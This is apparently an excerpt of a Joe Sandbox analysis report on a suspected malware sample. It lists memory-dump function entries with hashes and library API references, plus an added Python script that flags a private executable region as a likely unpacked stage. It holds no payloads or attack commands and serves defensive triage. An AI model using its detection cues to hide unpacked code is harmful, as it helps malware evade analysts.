                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 78362717-0
                                                                                                                                                                                                                                                                          • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                          • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
• Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024B63AF
• Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024B63C3
• Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024B63DB
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024B63F3
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• String ID:
• API String ID: 78362717-0
• Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction ID: 27135b7cb652ef6265316e3c59b4e04065e28b3d5c569a891c49cc10221611e2
• Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction Fuzzy Hash: 5B01D636600114B7DF17EE65C850AEF779EDF55350F01045BEC21AB381DAB1ED118AB0
APIs
• Concurrency::location::_Assign.LIBCMT ref: 024B2BB1
• Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024B2BCF
  • Part of subcall function 024A8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024A86A8
  • Part of subcall function 024A8687: Hash.LIBCMT ref: 024A86E8
• Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024B2BD8
• Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024B2BF8
  • Part of subcall function 024AF6DF: Hash.LIBCMT ref: 024AF6F1
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
• String ID:
• API String ID: 2250070497-0
• Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
• Instruction ID: 98bbc2ef6c4a819673a9bd935fc39826533340a999af2b5411199a66d344df78
• Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
• Instruction Fuzzy Hash: 8C117C76800604ABC715DF65C890ACAF7B9BF59320B014A1FE95A8B551DBB0E904CBA0
APIs
• Concurrency::location::_Assign.LIBCMT ref: 024B2BB1
• Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024B2BCF
  • Part of subcall function 024A8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024A86A8
  • Part of subcall function 024A8687: Hash.LIBCMT ref: 024A86E8
• Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024B2BD8
• Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024B2BF8
  • Part of subcall function 024AF6DF: Hash.LIBCMT ref: 024AF6F1
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
• String ID:
• API String ID: 2250070497-0
• Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
• Instruction ID: 04b7ef5611412a3e6f83fff8b8e3c99265c916775d7181590b29daf7a5025c4d
• Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
• Instruction Fuzzy Hash: CD011776400604ABC715DF6AC891EDAB7F9FF58320B008A1EE55A87650DBB0F944CB60
APIs
• __EH_prolog3_GS.LIBCMT ref: 00405926
  • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
• std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
• __Getcoll.LIBCPMT ref: 00405980
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
• API String ID: 1836011271-0
• Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
• Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
• Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
• Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
APIs
• __EH_prolog3_GS.LIBCMT ref: 024950D1
  • Part of subcall function 0249BDAE: __EH_prolog3_GS.LIBCMT ref: 0249BDB5
• std::_Locinfo::_Locinfo.LIBCPMT ref: 0249511C
• __Getcoll.LIBCPMT ref: 0249512B
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 0249513B
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
• API String ID: 1836011271-0
• Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
• Instruction ID: 5eb145ec457a884126c599b5249d2f305a822d70e51bdbe2bcda5e293ade1c3d
• Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
• Instruction Fuzzy Hash: 87018871D10208AFEF01EFA9D481B9DBBB1BF54315F50812FD055AB280CB749544CF95
APIs
• __EH_prolog3_GS.LIBCMT ref: 02495B8D
  • Part of subcall function 0249BDAE: __EH_prolog3_GS.LIBCMT ref: 0249BDB5
• std::_Locinfo::_Locinfo.LIBCPMT ref: 02495BD8
• __Getcoll.LIBCPMT ref: 02495BE7
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 02495BF7
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                          • Instruction ID: 76308099f333d1b1bb664119fadcda707349a68d7ef611e96cc11610f4682a43
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD019A71900208EFEF00EFA9D480BAEBBB1BF54315F20802FD055AB280CBB89944CF94
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                          • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC170
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC180
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC190
                                                                                                                                                                                                                                                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC1A4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                          • Instruction ID: d86c9070bf739f4af1e02929b4a024fd0d09b821d27c0afaf1be00be7cb3fbb9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF01B67A504149BBDF929F94DC918AE3BA6AF35350F048517F91888170D732C6B1EF85
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                                                                                                                                                                                            • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                                                                                                                                                                                            • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                                                                                                                                                                                          • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                                                                                                                                                                                          • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                                                                                                                                                                                          • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                          • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                                                                                                                                                                                                                            • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                                                                                                                                                                                                                            • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00413541
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                                                                                                                                                                                                                            • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                          • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                          • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
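The function entries in this section come from two memory dumps: the PE-backed image at 00400000 and a region at 02490000 that is not PE-backed. Several entries carry the same Opcode ID in both dumps but a different Instruction ID, which is what a byte-identical function copied to a new base address looks like. The script below is an added example, not Joe Sandbox code or output: it takes the entries listed on this page (constructed inline as records), decodes the dump filename into base address, page protection and memory type (the field layout and the meaning of the constants are an assumption inferred from the two filenames above, not something the report documents), and reports which Opcode IDs appear in more than one region and which non-PE private RWX region shares functions with the image. That is the evidence a triage analyst wants before spending time on the dump at 02490000 as the unpacked stage.

```python
"""Cross-reference Joe Sandbox function entries across memory dump regions.

Added example; not Joe Sandbox code. ENTRIES is constructed from the function
entries listed on this page. The .sdmp filename decoding below is an assumption.
"""
from collections import defaultdict

# Windows memory constants (winnt.h).
PAGE_EXECUTE_READWRITE = 0x40
MEM_IMAGE = 0x1000000
MEM_PRIVATE = 0x20000

# Constructed from the report entries above:
# (Opcode ID, Instruction ID, Source File, based on PE, APIs referenced)
ENTRIES = [
    ("3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae",
     "76308099f333d1b1bb664119fadcda707349a68d7ef611e96cc11610f4682a43",
     "00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp",
     False, ["__EH_prolog3_GS", "std::_Locinfo::_Locinfo", "__Getcoll", "std::_Locinfo::~_Locinfo"]),
    ("3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455",
     "a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9",
     "00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp",
     True, ["std::_Compare_exchange_acquire_4"]),
    ("3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455",
     "d86c9070bf739f4af1e02929b4a024fd0d09b821d27c0afaf1be00be7cb3fbb9",
     "00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp",
     False, ["std::_Compare_exchange_acquire_4"]),
    ("8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68",
     "3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146",
     "00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp",
     True, ["Concurrency::details::LockQueueNode::LockQueueNode",
            "Concurrency::critical_section::_Acquire_lock"]),
    ("a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285",
     "4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140",
     "00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp",
     True, ["Concurrency::details::LoadLibraryAndCreateThread", "GetLastError", "__CxxThrowException@8"]),
    ("a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285",
     "81d91a01cb2e836bed8c616c328e87e10c7f04290d2964ef754f1e950751ffd1",
     "00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp",
     False, ["Concurrency::details::LoadLibraryAndCreateThread", "GetLastError", "__CxxThrowException@8"]),
]


def parse_dump_name(name):
    """Split a .sdmp filename into its dot-separated hex fields.

    Assumed layout, inferred from the two filenames on this page:
    process.stage.sequence.base.protect.f5.memtype.f7
    Only base, protect and memtype are decoded; the rest is kept raw because
    its meaning is not established here.
    """
    stem = name[:-len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name layout: {name}")
    return {
        "base": int(fields[3], 16),
        "protect": int(fields[4], 16),
        "mem_type": int(fields[6], 16),
        "raw": fields,
    }


def is_private_rwx(region):
    """Private (not image-mapped) memory that is both writable and executable:
    the footprint of code written at runtime rather than mapped from disk."""
    return region["mem_type"] == MEM_PRIVATE and region["protect"] == PAGE_EXECUTE_READWRITE


def functions_by_opcode(entries):
    """Map Opcode ID -> sorted list of (region base, Instruction ID) it was seen at."""
    seen = defaultdict(list)
    for opcode_id, instr_id, src, _pe, _apis in entries:
        seen[opcode_id].append((parse_dump_name(src)["base"], instr_id))
    return {k: sorted(v) for k, v in seen.items()}


def relocated_functions(entries):
    """Opcode IDs seen at more than one base address. The same opcode-level hash
    with a different Instruction ID is consistent with the same code at a new
    address (assumption: the Instruction ID also covers operands, the Opcode ID does not)."""
    return sorted(k for k, v in functions_by_opcode(entries).items()
                  if len({base for base, _ in v}) > 1)


def candidate_unpacked_regions(entries):
    """Bases of dumps that are not PE-backed, are private RWX, and contain at least
    one function that also exists in a PE-backed dump."""
    shared = set(relocated_functions(entries))
    regions = defaultdict(set)
    for opcode_id, _i, src, based_on_pe, _a in entries:
        region = parse_dump_name(src)
        if not based_on_pe and is_private_rwx(region):
            regions[region["base"]].add(opcode_id)
    return sorted(base for base, ids in regions.items() if ids & shared)


if __name__ == "__main__":
    for opcode_id in relocated_functions(ENTRIES):
        where = ", ".join(f"{b:08X}" for b, _ in functions_by_opcode(ENTRIES)[opcode_id])
        print(f"{opcode_id[:16]}... present at {where}")
    print("candidate unpacked regions:",
          [f"{b:08X}" for b in candidate_unpacked_regions(ENTRIES)])
```

Note that the image region at 00400000 also reports protection 0x40 in its filename, so protection alone does not separate the two dumps; the report's own "based on PE" flag and the MEM_IMAGE versus MEM_PRIVATE field do, and the shared Opcode IDs then tie the private region back to the image. Entries present only in one dump (the Locinfo function at 02495B8D, the LockQueueNode function at 004110DB) are kept out of the relocation list, since a single sighting says nothing about copying.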
APIs
• Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024A378C
  • Part of subcall function 024A2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024A2B2C
  • Part of subcall function 024A2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024A2B4B
• GetLastError.KERNEL32 ref: 024A37A8
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A37BE
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A37CC
  • Part of subcall function 024A28EC: SetThreadPriority.KERNEL32(?,?), ref: 024A28F8
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
• String ID:
• API String ID: 1674182817-0
• Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
• Instruction ID: 81d91a01cb2e836bed8c616c328e87e10c7f04290d2964ef754f1e950751ffd1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F027B6A002153AD720FB724C06FBB3A9C9F20740F50086FB905E2180FAD8D4009AB4
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024A1342
                                                                                                                                                                                                                                                                            • Part of subcall function 024A0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024A0BD6
                                                                                                                                                                                                                                                                            • Part of subcall function 024A0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024A0BF7
                                                                                                                                                                                                                                                                          • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024A1355
                                                                                                                                                                                                                                                                          • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024A1361
                                                                                                                                                                                                                                                                          • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024A136A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                          • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                          • Instruction ID: b688c43a0d78029303f3726da037d7ece2edc5ebd6e53a3e4cfd1592b8ff110b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0B431641704A7AF147EBA08316BE35975FB1314F04416FE51AAF3C0DFB19E059B94
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024AD088
                                                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024AD0AC
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024AD0BF
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024AD0CD
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3657713681-0
                                                                                                                                                                                                                                                                          • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                          • Instruction ID: b0a4eca62322b1d84707fac2300e90fa9110b837576241020249691defa0fa32
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF05935E04204E7C724FB16D862C9EB77A8EB0B18360852FD80517685DB31A90ACEA1
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                          • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Cnd_initX.LIBCPMT ref: 02495A83
